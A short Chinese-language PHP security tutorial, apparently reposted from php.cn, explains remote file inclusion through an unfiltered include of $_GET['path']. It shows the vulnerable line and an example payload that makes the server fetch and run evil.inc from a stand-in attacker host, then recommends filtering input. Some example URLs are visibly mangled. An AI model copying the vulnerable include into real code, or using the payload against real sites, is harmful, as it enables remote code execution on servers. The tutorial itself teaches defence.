一個特別危險的情況是當你試圖使用被污染資料作為動態包含的前導部分時:
<?php include "{$_GET['path']}/header.inc"; ?>
在這種情況下攻擊者能操縱不只是檔案名,還能控制所包含的資源。由於PHP預設不僅可以包含文件,還可以包含下面的資源(由設定檔中的allow_url_fopen控制):
<?php include 'http://www.google.com/'; ?>
include語句在此時會把http://www.php.cn/的網頁原始碼當作本地檔案一樣包含進來。雖然上面的範例是無害的,但想像一下如果GOOGLE回傳的原始碼包含PHP程式碼時會如何。這樣其中所包含的PHP程式碼就會被解析並執行。這是攻擊者藉以發布惡意程式碼摧毀你的安全體系的良機。
想像path的值指向了下面的攻擊者所控制的資源:
http://www.php.cn/ ... e.org%2Fevil.inc%3F
在上例中,path的值是URL編碼過的,原值如下:
http://www.php.cn/
這就導致了include語句包含並執行了攻擊者所選定的腳本(evil.inc),同時原來的檔名/header.inc會被認為是一個請求串:
<?php include "http://evil.example.org/evil.inc?/header.inc"; ?>
這樣攻擊者就避免了去猜測剩下的目錄和檔名(/header.onc)並在evil.example.org上建立相同的路徑和檔名的必要性。相反地,在受攻擊網站的特定檔案名稱被封鎖的情況下,他只要保證evil.inc中輸出合法的他想要執行的程式碼就行了。
這種情況與允許攻擊者在你的網站上直接修改PHP程式碼一樣危險。幸運的是,只要在include和require語句前對資料進行過濾即可防止這種情況的發生:
<?php $clean = array(); /* $_GET['path'] is filtered and stored in $clean['path']. */ include "{$clean['path']}/header.inc"; ?>
以上是PHP安全-程式碼注入的內容,更多相關內容請關注PHP中文網(www.php.cn )!